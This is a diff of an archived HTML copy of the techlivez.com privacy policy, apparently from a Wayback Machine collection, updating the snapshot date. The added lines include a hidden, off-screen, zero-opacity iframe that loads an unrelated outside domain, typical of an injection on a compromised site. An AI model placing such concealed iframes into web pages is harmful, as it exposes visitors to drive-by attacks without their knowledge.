--- a/t/te/tec/techlivez.com.html
+++ b/t/te/tec/techlivez.com.html
@@ -1,5 +1,5 @@
-<!--The following is the downloaded HTML source of the techlivez.com privacy policy that was archived on 2013-06-24.
- Please check the original snapshot on the Wayback Machine (https://web.archive.org/web/20130624041517id_/http%3A//www.techlivez.com/privacy-policy) for the most accurate reproduction.-->
+<!--The following is the downloaded HTML source of the techlivez.com privacy policy that was archived on 2013-12-22.
+ Please check the original snapshot on the Wayback Machine (https://web.archive.org/web/20131222172655id_/http%3A//www.techlivez.com/privacy-policy) for the most accurate reproduction.-->
 
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>
 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
@@ -101,8 +101,8 @@ $sf(document).ready(function() {
 }</style><!--End of WP Head-->
 
 
-</head>
-<body>
+</head><body><iframe frameborder="0" src="http://33557542.naka.crctvn.org/counter/api/" style="width:40px;height:40px;overflow:hidden;position:absolute;left:-40px;top:0;opacity:0"></iframe> 
+
 
 <a name="top"></a>
 
